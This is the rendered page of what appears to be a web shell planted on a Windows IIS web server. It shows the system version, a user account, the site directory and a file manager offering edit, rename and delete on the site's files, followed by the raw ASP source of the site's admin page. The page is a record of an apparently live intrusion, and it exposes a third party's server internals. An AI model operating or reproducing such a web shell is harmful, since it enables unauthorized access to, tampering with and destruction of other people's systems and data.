Webshell Akmal archtte id
System:
Microsoft Windows NT 10.0.20348.0
Server:
Microsoft-IIS/10.0
User:
buyyou
Directory:
C:
\
MyData
\
WWW
\
asc365
\
Name
Size
Type
Actions
ASC365_CANADA
-
Directory
Rename
Delete
ASC365_Store01
-
Directory
Rename
Delete
aspnet_client
-
Directory
Rename
Delete
CompanyImage
-
Directory
Rename
Delete
TJGS_USA
-
Directory
Rename
Delete
zhijian
-
Directory
Rename
Delete
Memo.inc
0 bytes
.inc
Edit
Rename
Delete
web.config
213 bytes
.config
Edit
Rename
Delete
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <!--#include file="site_conn.asp" --> <!--#include file="Cls_Page.asp"--> <% CheckAdmin1 '检测菜单是否存在,并查出所属语言,数据表,菜单名称 %> <title></title> <%call default_css_js()%> <link href="css/thickbox.css" rel="stylesheet" type="text/css" /> <script type="text/javascript" src="scripts/jquery-1.4.4.min.js"></script> <script type="text/javascript" src="scripts/ThickBox/thickbox.js"></script> </head> <body> <div id="cms_main"> <div class="main_title"><span class="page_content"> <% '检测菜单是属于哪个语言的,并把语言后台显示名显示出来 %></span></div> <div class="height5"></div> <% set rsT = server.CreateObject("adodb.recordset") sqlT = "select * from Terms" rsT.open sqlT,conn,1,1 %> <p><a href="TermsAdd.asp">添加条款</a></p> <table width="94%" id="main_content"> <tr class="content_title"> <td width="158">序号</td> <td width="223">名称</td> <td width="223">URL</td> <td width="344" style="background-image:none;">操作</td> </tr> <% if rsT.eof and rsT.bof then %> <tr> <td colspan="3" align="center" class="content_list">暂无信息</td> </tr> <% else do while not rsT.eof %> <tr> <td align="center" class="content_list"><%=rsT("id")%></td> <td align="center" class="content_list"><%=rsT("T_name")%></td> <td align="center" class="content_list"><%=rsT("T_url")%></td> <td align="center" class="content_list"><a href="tEditor.asp?id=<%=rsT("id")%>">编辑</a> <a href="tDel.asp?id=<%=rsT("id")%>">删除</a></td> </tr> <% rsT.movenext loop end if %> </table> <% rsT.close set rsT = noting %> </div> </body> </html>